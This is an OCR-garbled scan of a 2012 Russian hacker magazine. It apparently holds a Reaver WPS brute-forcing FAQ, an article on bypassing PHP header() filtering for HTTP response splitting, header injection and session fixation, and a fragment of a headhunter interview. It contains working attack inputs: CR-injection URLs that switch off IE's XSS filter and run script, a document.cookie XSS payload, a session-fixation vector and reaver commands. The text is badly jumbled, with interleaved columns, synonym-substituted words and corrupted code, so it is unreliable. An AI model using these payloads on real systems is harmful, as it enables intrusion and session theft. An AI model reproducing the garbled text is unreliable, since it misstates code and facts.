Есть нераздельно омерзительный ба г во Reaveг версии

доступа .

0.3,

ради которого невыгодный определяются снятия

подобных блокировок . В качестве варюра­ Почему у меня безграмотный работает спуфинг

унда предлагают пускать в ход опцию

a.l

МАС-адреса?

· --ignoгe-locks' не так — не то скачать последнюю

Почему быть плохом сигнале Reaveг

...

Возможно, твоя милость спуфишь МАС виртуально-

версию с

работает плохо, добро бы оный а взламывание WEP

081

го интерфейса mопО, а сие делать

WP5.

проходит нормально?

безграмотный будет. Надо устанавливать кличка реального

n естественным путем хакинг

интерфейса, например, wlaпO .

WEP происходит путем повторной пересылки перехваченных

081

Это происходит потому, ась? крапинка

r;t

сверху промежуток времени стать костью в горле пользование

0':'1 a.l

Почему аз многогрешный непрерывно получаю ошибки

a.l

0VN.

mМожно ли в ведь же время засунуть два и побольше экземпляров Reaveг чтобы ускорения

атаки?

n

Теоретически МОЖНО, НО неравно ОНИ будут

танцевальный шаг кетов, чтоб произвести в большинстве случаев векторов

Reaveг всё-таки минута посылает точке доступа

инициализации (IVI, необходимых пользу кого

единственный да оный но

успешного взлома . В этом случае неважно,

Проверь, активирован ли сверху раутере

скоростьперебораедвалиувеличится,таккак

потерялея какой-либо пакет, либо раз как-то

WP5. Это

на данном случае возлюбленная ограничивается слабым

ПРОКАЧИВАЕМ В

PIN,

дозволено произвести присутствие помощи ути-

стрелять одну равно ту но точку доступа, в таком случае

REAVER

пишущий сии строки показали самый бесхитростный да особенно общезначимый

HOWTO

081

на нежели дело?

сноровка использования утилиты Reaveг. Однако отпуск

WP5 у

разных

0. Некоторые точки доступа

могут не позволить

WPS в

определенное

эпоха , заподозрив, аюшки? их пытаются поиметь. Reaveг эту ситуацию замечает

производителей отличается, почему на некоторы х случаях необходима

да делает паузу во переборе получи

дополнительная настройка. Ниже пишущий эти строки приведу дополнительные опции,

паузы не грех менять:

015

секунд согласно умолчанию, долгота этой

которые могут умножить прыть равным образом действительность перебора ключа.

# reaver -i

0. Можно сорвать голову закидон

канала да

# reaver -i

00 : 01:02:03:04:05

0. mопВ

mопВ -Ь

00:01:02:03:04:05 --lock-delay=25B

0510 точки доступа: -с

01

-е liпksys

Некоторые реализации протокола

WPS

разрывают сочленение быть

неправильном РIN-коде, хотя бы соответственно спецификации должны возвращать особое сообщение . Reaveг непроизвольно распознает такую ситуацию, ради сего

0.

Благотворно сказывается получай скорости брутфорса опция

·-- dh-small',

существует опция · --пасk' :

которая задает небольшое важность секретного ключа, тем самым облегчая

# reaver -i

выкладки бери стороне точки доступа:

# reaver -i

mопВ -Ь

00:01:02:03:04:05 -vv --dh-small

0. Опция

mопВ -Ь

00:01:02:03:04:05

--пасk

' --eap-teгmiпate' предназначена чтобы работы вместе с теми АР, которые

требуют завершения WРS-сессии из через сведения ЕАР

0. Таймаут ожидания

необходимости его позволительно изменить:

# reaver -i

# reaver -i

0. Возникновение

mопВ

FAIL:

ответа соответственно умолчанию равен пяти секундам . При

00 : 01:02:03:04:05 -t 0

mопВ -Ь

00:01:02:03:04:05

--eap-termiпate

ошибок во WР5-сессии может означать, почто АР

ограничивает контингент попыток ввода РIN-кода, либо попросту перегружена

0. Задержка

посередь попытками объединение умолчанию равна одной секунде. Она

# reaver -i

ХАКЕР

mопВ -Ь

03 /158/ 00 02

00:01:02:03:04:05 -d

запросами . В этом случае Reaveг приостанавливает свою деятельность,

притом минута паузы может являться задано от через опции

т акже может бытийствовать настроена: В

# reaver -i

mопВ -Ь

·--fail-wait':

00:01:02:03:04:05 --fail-wait=360

023


COVERSTORY &lt;script&gt;alert(&quot;Recognize-Security &quot; +document .cookie ); &lt;/script&gt;&lt; !-- "></ head ><body></body></html >

DISCLAIMER

Вообще, во п роцессе аудита первично г насчёт стих веб-приложений

для РНР нередко попадаются конструкции вида

header( "Location: " .$_GET[ 'backto_url' ]) иначе даже если header( "Location: / index. php?lang=".$_G ET[ 'lang' ]). Е сли первую сызнова позволительно классифициро­

ZeгoNights, а только что написана согласно его мотивам. Помимо материала,

вать добро бы бы равно как уяз вимость класса О реп R ediгect, ведь вторая небось

дальнейших исследований, посвященных филырации РНР­

бы суммарно отнюдь не является уязвимостью . Опытный выпивоха заметит,

функций равно механизмам работы браузеров вместе с

чт насчёт на этом месте на явном виде что единожды таки равным образом присутствует ба г в виде НТТР

доклада, касающаяся уязви мастей, связанных от заражением

Response Sp li tti ng, %0 d%0a

изложенного в пора доклада, во статью да вошло оnисание .

cookies. Часть

кеш а, да smuggling-aтaк, короче изложена во расширенном виде

н касательно всё занятие на том, ч т по части современные версии

интерпретатора РНР [начиная со 0006-го года] фильтруют раздели­ тели

Эта артикул далеко не является копией мой доклада бери конференции

на следующих выпусках журнала.

да препятствуют проведению атаки. Вот сие равным образом убирать та

самая практическая предпосылка, которая заставила меня сделать первые шаги

углубленное анализ данной темы. Поэтом у предлагаю невыгодный веровать

эти РНР

первому впечатлению относительно фильтрации на функции headeг[] равно разо­

которая предотвращает насаждение заголовков равно защищает с атак

быть вместе с проблемой глубже, ведь, бытийствовать может, т акую фильтрацию

как «расщепление ответа>>. Таким образом, начиная не без; на ерсии РНР

0.4.2

позволяется обойти.

равно

0.4.2

0.1.2,

равно

0.1.2

во этой функции осуществляется фильтрация,

дисконтированный вверх адрес н е является уязвимым для того атак

будто <<в недр ение заголовков>> равно <<расщепление ответа>>:

ПРОТОКОЛ НТТР Обратимся ко переаисточнику [спецификации протокола НТТР] , что­ бы понять, какие символы могут работать разделителями заголов­

засада НТТР- ответа. П олный конферанс спецификации доступен в области адресу

Ьit .l y/ г9pLL , нас а интересует раздел

0 - Re sponse

c ?php header( "Location : / basic/ " .$_GET[ 'redirect ' ] . ".html" ); ?>

[ Ьi t .ly/BEAq4 ].

Общая состав НТТР- ответа имеет нижеперечисленный видимость :

В результате попытки проведения таких атак достаточно вызвана ошибка подобно Waгniпg, грубо такая:

RFC-2616 Response=Status-Line; Section 0.1 * (( general-header; Section 0.5 1 response-header; Section 0.2 1 entity-header ) CRLF); Section 0.1 CRLF [ message-body ]; Section 0.2

Документация

test.php?xxx=bbb%0a%0dNew-Header:ЫaЬla

Warning: Header may not contain more than а single header, new line detected. in test.php оп line 0 Н что до ну-кась неграмотный будем разом навешивать ярлыки, а разберемся в проблеме хоть сколько-нибудь глубже. Рассмотрим шифр интерпретатора, что

Из приведенной вне информации ясно, почто разделителем заголо вк ов является цепь

CRLF,

пользуется про относительно тд еления тела отве т а по части т блока заголовков . В кодированном виде

CR LF

выглядит в духе

выполняет фильтрацию разделителя :

которая как и ис­

%0 D%0A.

URL-

Именно во таком

виде симпатия равно используется пользу кого проведения классических атак как

«рас щепление запроса». Эти методы ладно работали поперед тех пор, пока интерпретаторы малограмотный обзавелись функциями фильтрации

CRLF,

/* new line safety check */ char *s=header_line, * е=header_line + header_line_ len, * р; while (s < е && (р memchr(s, ' \n' , (е - s)))) { i f ( *(р + 0 )== ' 01 *( р + 0 )=='\t ' ) {

относительно ко т орых теперь да пойдет речь.

0=

р

+ 0;

continue ; ФИЛЬТРАЦИЯ РАЗДЕЛИТЕЛЯ

CRLF

В РНР

Ф ункци пишущий эти строки headeг[] [ Ьit .l y/wVbbcd ] свободно используется на РНР для того

efree(header_line ); sapi_module.sapi_error(E_WARNING, "Header may not contain more than а single header, new line detected. "); return FAILURE;

передачи заголовков во НТТР -ответе сервера. Чаще общей сложности ее при­

меняют для того переадресации пользователей со одной страницы веб­ приложения нате другую. Как как автор этих строк погляжу изо документации, начиная не без; во ер-

Browser Single

Second Content-Length header

data

header

schema

splltter byte

ln Refresh header

Как видно, в этом месте осуществляе т ся осмотр бери наличность символа

LF

[в URL-кодированном виде выглядит во вкусе % Од] . Пр да обнаруже­

нии такого символа, позднее которого овчинка выделки стоит как бы исключая табуля-

ции

[%09]

да пр обела

фильтруется н е

[%20], вызывается ошибка. Таким образом, CRLF, а лишь LF-байт. Согласно RFC , какой наш брат

не далее как изучили, всё работае т безопасно. Н что до предл а гаю неграмотный сда­ ваться круглым счетом амором равно разнюхать у браузеров, соблюдаю т ли они

RFC

во точности? П ервым делом не грех проверить, что браузеры воспри­ нимают форточка не без; первым пробелом да табуляцией. Для сего на­ пишем прос т ой РНР-скрипт равным образом проверим его около во семи браузерам да :

Таблица тестирования браузеров держи частный разделитель, сдвоенный заrоловок длины и Refresh-зaroлoвoк

026

c?p hp header( "X-Test1:1 \ r \ n Set-cookie: is1=0K " ); header( "X -Test2 : 0\ r \ n\ tSet-cookie : is2=0K" ); echo "cscript >alert(document.cookie) </ script >" ; ?>

ХАКЕР

03/158/2012


Расщепляй равным образом властвуй

П олучается, только лишь lпtегпеt Е хрlогег понимае т куки на таких хидерах. Таким образом, всего-навсего прочитав

RFC

равным образом просмо т крик

исходник да РН Р равно три строки т естово г по отношению кода, я ранее выяс н или, вроде

обижать филырацию функции headeг[J в целях

IE, равным образом имеет принципиальное значение рас­

ширили округ применения большинства уязвимостей, которые

~

*

0

Веб

localhost:8080/php·smug/index2.php

Warning: Header may not contain more than \indexl.pbp on line 0

а

single header, oe\v line detected. in

'1

поначалу классифи ц иро на алис ь т по отношению л ько наравне О реп Rediгect. Н насчёт небу­ дем стопориться бери дости г нутом да двинемся дальше. Впереди другие браузеf)Ы равным образом новые идеи.

Работа фильтра функции headeгll во РНР не без; 0006 годы вызываетта кую ошиб ко у

+ Д а, ч т ение скончание н ых кодов РНР да рассуж д ение от точки зрения

здравой логики сейчас дало из на ои п ло д ы. Мы нашли сnособ внедрения заголовков пользу кого браузера lпteгnet Е хрlогег. Пре д лагаю далеко не останав­

*0

~

Веб

localhost8080/ php·smug/index2.php

Warning : Cookie names can not contain any ofthe foJlo,ving '=,; \t\r\n\013\014' in \indexl.pbp on line 0

'1

ливаться держи достиг н у т ом равным образом n р по отношению д олжить начатое исс л едование, что­

бы познать доби т ься того а равным образом интересах д ругих браузеров.

Итак, исходники Р Н Р считается относительно филырации % 0а [\nили LFI.

Рабо та ф да льтр а фун ко ци равным образом setcookiell в области первому аргумен ту

Предnоложим, зачем сущес т вую т какие-то бай т ы, которые могут ~

служи т ь в один из дней д елителями заго л овков для того браузеров. Д л моя персона nроверки этого предположения напишем аляповатый фаззер равно запустим его по-под

различными браузерам и. Н аиболее важные куски заключение фаззера

*0

nри на е д ены дальше :

'1

#! / usr / bin / perl use str i ct ; use warni ng s; use Socket ;

Веб

loca lhost8080/ php·smug/ index2.php

Warning: Cookie values can not contain any ofthe foJlowing ',; \t\r\n\013\0 04' in \indexl.pbp on line 0

Работа фильтр а функци равным образом setcookiell по мнению второму аргументу

н улл-байт. Информацию об этой уязвимости мы отправил произво­

дителю. Ей был присвое н закидон 05992 да ватерпас зарубка Low [это не позволило ми извлечь воздаяние ради ее обнаружение,

listen SERVER , 0е ; $an sw="НТТР/1.1 0ее OK\r\n" ; for ($ i=e ; $i <256;$i++ ){ $an sw.="Set-cookie: cook-$i=1" .c hr($i);

что, во общем, беспристрастно - сие чай скорехонько ба г, нежели уязвимость!.

ту

В итоге на 05-й версии Хрома нул л-байт сделано поправи л и, а ко моме нт у выхода этой статьи, подозреваю, актуальной довольно сделано 07-я версия бра у зера. F i гefox но остается получи и распишись высоте, nоскольку реализован в этой части ровным счетом так, в качестве кого описано на

$answ .="\r\n\r\n<h1>Test splitting bytes</h1>" ;

RFC. Следовательно,

ни единолично

изо найденных нами способов обхода филыров Р Н Р интересах него рабо­ тать отнюдь не будет. Фаззер бог простой: не без; его через наш брат выясняем, может

ли какой-т что до единолично байт [под ч ерки на аю, то-то и есть частный байт,

РАСЩЕПЛЯЕМ ОТВЕТ И ПРОВОДИМ

XSS

а невыгодный д ублет! служит ь раздели т елем заголовков во браузерах, во вкусе

Настало срок использовать в своих интересах найденными на фильтре ошибка­

CR LF [%0d%Dal. Д ля э т относительно г что касается получай сокетах nишем веб - микросервер,

ми равно nроэксnлуатировать уязвимости функции headeг[J, так очищать

ко т орый в кто хочешь НТТ Р-за п рос браузера дает относительно т вет, со д ержащий

утвердить никак не посредственную атаку. Здесь пред нами встает

х идеры

Set-cookie,

разделенные каждым с

056

байт в соответствии с очереди.

Соот во етственно, даже если какой-то байт срабатывает на правах разделитель,

новая заморочка - самочки браузеры имеют замонтированный механизм защиты через расщепления ответа . Вот в качестве кого экстремально по сути дела

поя во ляетс аз многогрешный новоизобретённый кукис, даже если но неграмотный срабатывает, так для значению

подчас в дугу сгибать из l iепt - sidе-уязвимости: сперва борешь­

текущего кукисадописывается абзац ви д а

ся не без; фильтрами держи серверной стороне, а далее бьешься пока что равным образом вместе с

<«N>Set-cookie :.. >> . За­

пускаем скрипт, заходим вместе с через браузера, считаем количество проставленн ы х куки, смотрим, какие байты вместе с р аботали, спустя время nро ­

клиентскими.

Итак, раздробление отве т а глав н ым образом основано нате пере­

буем последующий браузер. П роцедура малограмотный адски у т омительная, этак

даче ложного заголовка Content-Leпgth, кто долженствует бросать

наравне в целях тестов да мы вместе с тобой берем токмо самые популярные браузеры, кото­

браузеру, в какой мере байтов содержится на теле НТТР-ответа. Однако

рых итого п автор этих строк т ь

:-1. Тем

отнюдь не менее, рекоме нд ую т ебе самос т оятельно

п ри вызове headeг[J лично Р НР отправляет насчёт д ан текстовка Coпtent­

видоизменять фаззер и так бы чтобы автоматизации подсчета куки

Leпgth со значением О, с сего никуда безвыгодный деться. Таким образом,

да поиска разделителей [исходники фаззера ищи держи нашем диске!.

строгий НТТР Response Splitting [расщеnление НТТР-ответаl

Получаются видишь такие равно н тересные резул ьтаты:

работает всего-навсего тогда, рано или поздно браузеры воспринимаю т второстепенный за­ головок

Content-Length

на правах да верный. Здесь равным образом начинаются

проблемы, так как ни единолично новый браузер где-то отнюдь не де­

0/9 %ed Fi r efo x 0 Oper a %ed Chrome %ed %ее ( Is s ue 05992 fi xed i n re l . 05) Safa r i %ed н

лает. Тем малограмотный менее, позволительно nровести атаку чтобы lnteгnet Е хрlогег, воспользовавшись т ем, зачем нынешний браузер расnознает Н Т МL-код во от­ вете, хоть безграмотный читая хидер

Content-Length.

Это паче нежели странное

nоведение имеет пространство на браузере из 0-й соответственно 0 - ю версию . П ишем уязвимый Р НР -сценарий:

Как видно, весь браузеры, за исключением F iгefox, воспринимают оди­ ночный

CR

т очно что-то около же, что равным образом всю вереница

CR LF.

Вот э т что касается уж настоя щ ий резул ьтат, раз д аря ко т орому можно н е всего только затылок на да т ь уязвимость, однако да совершить атаки держи ее основе

<?php header( "X-Header: aaa" .$_GET ( 'r' ] ); ?>

реально кросс-браузернымиl Отмечу, что, при случае моя персона начинал эти с ы ска н ия, ак т уальной была 04-я разночтение

Goog le C h гome,

дл аз многогрешный

ко оторой опять же существовал другой байт-разделитеть -

Х АКЕР ОЗ/15 0/ 0 01 0

Затем n рово д им атаку nод l nteгnet Е хрlогег посре д ством вот такого НТ ТР -заnроса :

027


COVERSTORY обсудили. Еще единодержавно IЕ'шный заголовок, X-Content-Type-Options, ·

/index.php?r=foobar%ed<html>%ed<hl> TEST </h l >

предоставляю тебе покупать самостоятельно. Остальные заголов ­ ки с целью управления безопасностью поддерживаются всеми браузе­

Вывод сего вместе с часовня твоя милость сможешь изведать возьми соответствую­

щем скриншоте. На узловой взгляд, всё сделано хорошо. Однако нас

рам равным образом . Однако запомни по образу аксиому следующее утверждение: заго ­

ловки перезаписываются [за исключением Content-Length). Таким

блокирует замонтированный во браузер ХSS-фильтр, в отдельных случаях автор сих строк пробуем

образом, header( "Location:

насадить воттакой прогноз :

дает полноценную ранимость Open Rediгect около эксплуатации

/index .php?r=foobar%ed<html>%ed<script > alert(/Splitting/)</script>

хотите- верьте, хотите- проверьте. Сейчас ваш покорный слуга никак не буду nеречислять

/index.php?lang=" .$_GET[ 'lang' ])

вектора ?lang=aaa % 0dlocation:http://yandex.гu. Как говорится, все возможные заголовки lпрочитать в рассуждении них твоя милость сможешь в соответ­ ствующей врезке), а остановлюсь всего только держи самых значимых. Итак, Access-Contгoi-AIIow-Oгigin- сие после очко овок, какой-никакой

Пройти подобный трасса равно безграмотный произвести желаемого результата, упер­ шись во какой-то в дальнейшем фильтр,- сие отнюдь не интересах нас. Вспоминаем, что такое? я

работает nочти nод всеми браузерам и, не считая Орега, во книжка числе

можем невыгодный исключительно приводить веточка ответа сервера, так да вводить

подина lnteгnet Ехрlогег 0+, Fiгefox 0.5+, Safaгi 0+ да Google Chгome. Для

заголовки. К тому но ХSS - фильтр lпtегпеt Ехрlогег, вопреки нате ведь

основы советую получить представление из первоисточником lmzl.la/4sгnwml.

что-нибудь некто здорово прибавил во сигнатурах объединение сравнению от 0-й версией

Как видно, данный рубрика позволительно истощить не без; дополнительными

браузера, всё беспричинно же, во вкусе равным образом раньше, отключается из через специ­

следовать шайба насчёт во ка ми Access-Contгoi-AIIow- Methods,

ального заголовка X-XSS-Pгotectioп: О. Ну вот, крайний кусочек пазла встал нате место, да в настоящее время позволительно протягивать полноценную

Headeгs, Access-Contгoi-Max-Age равно некоторыми другими [снова обрати чуткость сверху приведенную превыше ссылку ). Назн аче ни е сих

атаку.

заголовков, думаю, прямо изо их названий. Access-Contгoi - AIIow­

Финальный НТТР-запрос для уязвимому сценарию имеет следую­

Access - Contгoi-AIIow­

Oгigin позволительно исnользовать по образу для того усиления, в такой мере равно с целью ослабления безоnасности . Всё работа на том, в чем дело? буде сей текстовка отнюдь не содер ­

щий вид:

жится во ответе, пришедшем ото сервера, так проход при помощи XHR ко со­

/index2 .php?r=foobar%edx-xss-Protection:e%ed<html>%ed <script >a lert( /xss/)</script>

держимому тела такого ответа запрещен. Таким образом, автор можем внедрить маргиналий «Access-Contгoi-AI I ow-O гigin : •" да nрочитать полный опровержение со всеми конфиденциальными д анными.

ЧЕРЕЗ ТЕРНИИ К ЗВЕЗДАМ Мы начали со чтения RFC, по времени заглянули в середку РНР, затем плав­

ОСМАТРИВАЕМСЯ

да перешли ко изучению механизмов, применяемых браузерам равным образом чтобы

Итак, автор сих строк нашли определенные уязвимости функции headeгll. На­

обработки ответа, равным образом вот, наконец, получили важные результаты.

таким образом минута узнать, существуют ли какие-нибудь остальные функции,

Мы разобрались от lntегпег Е хрlогег равно рассмотрели инъекция за­

выnолняющие аналогичную фильтрацию. Собственно, на РНР име­

головков на НТТР -о тв ет. Сам методика безвыгодный является частным случаем

ется лишь три функции, которые занимаются в отношении тправ каковой заголов­

расщепления ответа, этак на правах рядом его использовании появляется

ков: headeгll, setcookiell равно setгawcookiell. В результате недолгого

только лишь сверхсметный заголовок, а безвыгодный вторичное органон ответа. А разве ты да я

изучения легко и просто выясняется, что-то двум последние функции, беспричинно но

отнюдь не внедряем интрузив ответа, в таком случае равным образом проблем от Conteпt-Length у нас в свою очередь

в качестве кого равно headeгll, уязвимы во аргументах $path да $domain . Уязвимые

далеко не будет, ведь, в соответствии с RFC, запись НТТР ни почти каким видом невыгодный регулирует

доводы есть, же их видоизменение пользователем во Приложениях

цифра заголовков . Теn ерь предлагаю nойти тогда да nристу­

встречаетс моя персона будет редко. Обычно ото nользовательских nара­

положения риз ко изучению др угих потенциально внедряемых заголовков, тем

метров зависит лишь только наименование alias зна чени е куки, а не заманить кого куда и калачом безвыгодный землевладение

паче что-нибудь да мы со тобой единаче далеко не выяснили, что прокладывать атаку почти остальны­

равно невыгодный дорога . Поэтому анализ долженствует удлинить . В имени и значениикукивыполняется незначительно побольше строгая фильтрация,

ми браузерам и.

нежели на функции headeгll:

ВНЕДРЯЕМ ЗАГОЛОВКИ Как уж было отмече н насчёт выше, заголовки малограмотный влияют бери Content-

Length, а значи т, их не возбраняется насадить во НТТР- отповедь в целях любых браузеров. В нынешнее миг существует н емало заголовков для управления безопасностью, одиночный изо которых, X-XSS-Pгotection, управляющий встроенным ХSS-фильтром l nteгnet Ехрlогег, наш брат уж

i f (name && strpbrk(name, "=,; \t\r\n\el3\el4" ) !=NULL) { !* man isspace for \ еlЗ and \ el4 */ zeпd_error( E_WARNING, "Cookie names сопение not coпtain any of the followiпg'=,; \\t\\r\\n\\el3\\el4' " );

ЗАГОЛОВКИ УПРАВЛЕНИЯ БЕЗОПАСНОСТЬЮ 1. X-Frame-Options. Содержит перечень доменов,

Coпteпt-Security-Policy : allow http://*:80.

идентификатор сессии, а а там попросту

из которых текущий сайт может состоять загружен

З.

подождать, все еще юзер авторизуется,

на ifгаmе/fгаmе-контейнер . Для проведения атаки допускается истощить X-Frame-Optioпs : allow-fгom

attacker. 2. X-Content-Security-Policy.

Refresh . Старый благодушный Refгesh . Дает внедрение HTML близ использовании dаtа­ схемы другими словами Open-гedirect : Refresh : 0,data:text/ html,<h1>0K</h1>. В таком содержимом Chгome

да утилизировать данный наименование про вторичной

аутентификации. Вектор может выглядеть примерно следующим образом: foobaг :% 0d5et­

каталог доменов, со которых запрещено

схема выполняется невыгодный во целевом домене ,

Cо насчёт k i е: Р Н Р5 Е 051 D=FA К Е D%0d Locat ion=/ auth.php. Разумеется, такая элемент полноте

заваливание содержимого . Скажем, когда сервер

а во праздник самой data-c x eмe, что-нибудь безвыгодный позволяет

мучиться всего на книга случае, даже если веб­

устанавливает во ответе X-Content-Secuгity­

злоумышленнику обманывать

вставка впоследствии авторизации безвыгодный отправляет

Policy : allow 'self', ведь адрес <script src="http://at-

0. Set-cookie. Его автор этих строк привожу после этого

tackeг.com/1.js"><scгipt> трудиться сверху странице

до невероятности к полноты. Используя

На практике

безграмотный будет. Таким образом, во значении с целью

оный заголовок, не возбраняется ввести рано

в целях 0ession Fixatioп !именно беспричинно называется

проведения атаки должен называть Х-

наготове lто снедать знакомый злоумышленнику!

сия атака!.

028

Содержит

фильтрует scгipt . Но, равно как бы вслед за тем ни было,

XSS.

пользователю новоявленный идентификатор сессии .

09% РНР-приложений уязвимы

ХАКЕР

03/158/2012


Расщепляй равно властвуй

01[~ .tf] http://t~stcom:8080/php·smug/i ndexl.php?rsfoobar%0d <html > %0 Р

х

Find: j9

0

Conten t-Lenиth:

PI'N~ous Nежт.

0

0

..

С, Х ' ~ testcom

Options .. 0

0 Keep-Alive: timc:ou\-5, max"" IOO Connecrion: Keep-Ative Content-Type: textlhtml

TEST Content·Lengtb: 0 Keep-Alive: timeout=5, ma:-;;=1 00 Connectioп : Keep-Alive Content-Typc: textlhtml

IE распознает НТМL-содержимое даже если

накануне Coпteпt-Length, так вкушать неуклонно во заголовках

return FAILURE ; }

if ( !u rl_encode && value && strpbrk(value, ",; \t\r\n\013\814" ) !=NULL) { /* man isspace for \ 013 and \ 014 */ zend_error( E_WARNING, "Cookie values сопение not contain any of the following',; \\t\\r\\n\\813\\814'" ); return FAILURE;

0 lnternet

Eжplorer has mod ified this page to Mlp prevent cross·site кripting.

Срабатывание ХSS-фильтра на

IE

chrome 0896 safari 0891-LEN(cookie_name) opera 0896 firefox 0896 iexplore 0116- LEN (cookie_name) ПЕРЕЗАПИСЬ КУКИ ПРИ ПЕРЕПОЛНЕНИИ ЧИСЛА Как всегда, отпустило обначить не без; чтения

RFC: www.ietf.oгg/гfc!rfc2109.txt . RFC нужно устремить нате фразу << at least 20 cookies рег unique host ог domain name». Здесь неграмотный говорится четко, долженствует ли браузерам содержать 00 кукинахост сиречь 00 Особое уважение на этом

} Функция stгpbгkll возвращает ложь, даже если на первом аргументе присутствует и так бы одиночный байт изо второго аргумента. Как видно,

куки для домен. Пусть самочки решают. Видимо, на 0997 - м г оду сие

просачивание именикукиотличается через фильтрации значения всего

казалось нормальным, хотя сейчас, нет-нет да и существую т чудовища

одним байтом- символом равенства. Прежде просто-напросто ми захотелось

из сотней поддоменов, текущий проблема паче нежели актуале н.

протестировать функцию фильтрации. Она является полным аналогом

Итак, в отдельных случаях ваш покорный слуга прочитал оный

RFC,

в таком случае принялся ловить настройки,

!вернее, прототипом] РНР'шной stгpbгk l php.su/fuпctioпs/?stгpbrk ] ,

определяющие максимальное наличность ко у ки во брауэерах, равным образом про­

которая оказалась небинарно совместимой . Казалось, зто победа,

верять, распространяются ли сии настройки бери nоддомены . Вот сколько

только никак не тут-то было! Дело на том, аюшки? хозяйка встроенная на РНР назначение

секс у чилось:

передачи ответа с сервера такженебинарно совместима, так лакомиться

нулл-байт обрывает со тр оку что разок на волюм месте, идеже я могли бы провести введение заголовка иначе говоря тела отве т а. В итоге подсвечник у зер получает еще укороченную согласно нулл-байту строку. Дальше был фаззинг, бесчисленно фаззинга . И никаких идей в отношении том, в качестве кого отшагать

фильтрацию, несмотря на то на старых версиях РНР символ=не обрезается.

Новые версии отнюдь не содержатуязвимости lя проверил их однако от

chrome 088 safari -2888/ LEN (cookie_na me+cookie_va l) opera 08 firefox 049 iexplore 09

0010

лета ] .

Как видно, сии значения малограмотный равны

00,

да все ж таки суще­

ственно поменьше 00000 :-].Что касается поддоменов, в таком случае точка соприкосновения

ОСОБЕННОСТИ

COOKIES

числокукисохраняется только лишь для того Орега равным образом Chгome, другие

Фаззин г постоянно дает какой-то результат, допустим даже если отнюдь не нимало тот,

ведут отсчеткукиотдельно про каждого поддомена . Ситуация

возьми тот или иной рассчитываешь изначально. Эксперименты не без; фильтра­

забавная, отчего который не возбраняется сорвать куки вышестоящего домена

цией в утробе первых двух аргументов setcookiell равно setгawc o okiell

вместе с нижнего уровня . А не грех ... Можно пронюхать имена куки выше­

как и принесли домашние плоды. Я выяснил забавные особенности об­

стоящего домена. РоС сего ба га интересах О ре га равно Chгome фактиче­

работки куки на браузерах да хочу растрепать об сих особенностях

ски представляет на лицо тотальный скоуп насчёт гр аниченного числа куки.

во вместе с т атье. Ведь уязвимости вторичны в области сравнению не без; теми метода­

Что будет, при случае от вверху вместе с тоящего домена придет IN+1]-й кукис?

ми, от через которых они были найдены. Как гласит китайская

Он перезапишет како й -токукис с скоупа. Правильно, а ка-

народная мудрость, отдашь свою рыбу- накормишь товарища

кой? Самый старый? Нет, на волюм равно близ кол, аюшки? некто выберет кукис

нате день, научишь его расставлять сети рыбу- накормишь для всю дни .

по части палеотип у . Пахнет бинарным поиском? Да, вот поэтому и есть так! С по­

Но хва т ит лирики, перейдем лично для результатам.

мощью этой прихоть ты да я можем разыскивать именакукивышестоящего домена вместе с нижестоящего по-под Орега равным образом Chгomel Н в отношении писат ь ко д перед

БЛОКИРУЮЩАЯ ДЛИНА ЗНАЧЕНИЯ КУКИ

эту задачу погано да малограмотный особенно нужно, фактически на реальной жизни

Если во качестве значения кукису послать вяще символов, нежели

значения куки камо важнее, нежели их имена, которые, в духе правило,

поддерживает браузер, кукисне проставится. Я воспользовался

являются статическими. Итак, подведу итог. Оказывается, мож­

этой особенностью, в отдельных случаях ми держи практике делать нечего было до­

однако сваливать куки, ежели лакомиться случай поставить угощение числа

воевать того, дай тебе такого склада гляди шифр неграмотный ставил куки :

своих. Иногда пользу кого одного домена, подчас как и чтобы п оддоменов

ICh гome, Орегаl.

<? php setcookie( "param8" , "PREFIX_" .$_GE T[ 'p8' ]);

leilii;Jel В добивание статьи моя персона бы хотел пригласить тебя nродолжить мое

?>

разыскание равно похерачить свое, сильнее современное да интересное.

Для решения этой задачи надобно

0096

символов . Предпо­

Надеюсь, ми посчастливилось отобразить малограмотный лишь только ядро различных ба го во

лагается, сколько лишняя продолжительность обрежется. Однако вовсе весь

будто НТТР

браузер ы не вдаваясь в подробности малограмотный ставя т такие кукисыl Следовательно, если бы

ку равным образом изучению. А разве нет- обещаю раскопать эпоха равно си лы , с намерением

кукис ранее существует, дьявол малограмотный п ерезапишется. Это без поблажек помогло присутствие

намалевать новые статьи интересах журнала. На постоянно воnросы

написании сплойта около небезукоризненность будто Sessioп Fixatioп. Вот такие

равным образом малограмотный всего лишь не без; радостью отвечу на своем благе i oxod . гu ]. Сnасибо

цифирь блокирующей длины значениякукиполучаются подина

из-за интерес равным образом поперед новых встречl :Х:

Response Splitting,

хотя да показать самолично подходец для их п оис­

no

от т атье

разными браузерам и:

ХАКЕР

03/1 08/20 02

029


COVERSTORY

&ИОГРАФИЯ Окончиnафакультет

журналистики МГУ.

Работала редактором 01 главным редактором на раэnичных иэданиях. Участвовала во соэдании портаnа гabota.ru, вэявwего nремию Рунета.

запустила редакция PaбoтalaMa\\.Ru. Зкс-хантер Ma\\.Ru Gгoup.

Основатель агентства интернет­ рекрутмига PRUFFI. один иэ ведущих экспертов рынка хантинга на рунете.


Интервью из вед ущим хедх антером рунета

ИНТЕРВЬЮ С ВЕДУЩИМ

АЛЕНА ВЛАДИ М И РСКАЯ

ХЕДХАНТЕРОМ РУНЕТА

О РАБОТЕ ХАНТЕРА

fгiends). Каждый изо нас является носи­

Многие воспринимают хедхантеров наравне раз­

до самого

0,5

миллионов рублей на месяц.

телем информации по части тех людях, не без; кото­

датчиков питание во блокадном Ленинграде. Все

рыми работает. Именно вы, а малограмотный король тер

Раз на гетто наша сестра делаем приманка обзоры,

думают, что-то буде сводить дружбу не без; нами да уметь вол­

сnособны nравильно признать достоинства сих

идеже ставим реальные зарплаты (pгuffi.

шебный телефончик ведущего хантера во рунете,

людей. Вы работаете из ними первый попавшийся

гu/analitika) . Цифры , которые я nри­

в таком случае зто в духе дополн равным образом т ельная монета ка хлеба. Ты зна­

день-деньской равным образом пунктуально можете сказать, кто именно убирать

водим, для

ешь продавщицу, да возлюбленная слыхать на правах может передать

кто: гляди этому товарищу общо шиш

тике через известных рекрутинговых nро­

тебе присовокупительный сухарик . Н по отношению для самом

воспрещается nоручать, а во нынешний в действительности

ектов. Почему? Объясню нате nримере .

деле отнюдь не может. Боле е того, в период блокады

сильный чувак.

00-40%

Мы знаем, ась? nрограм­

вслед зто расстреливали . Знание сего волшебного

телефона, согласно сути, сносно отнюдь не дает.

мист бери

Хантер обыкновенно знает Но подавляющая технических

Буквально только что у меня три дня малограмотный работала

сnециалистов - народ неnублич-

чинающий , круглым счетом в качестве кого немедленно сие

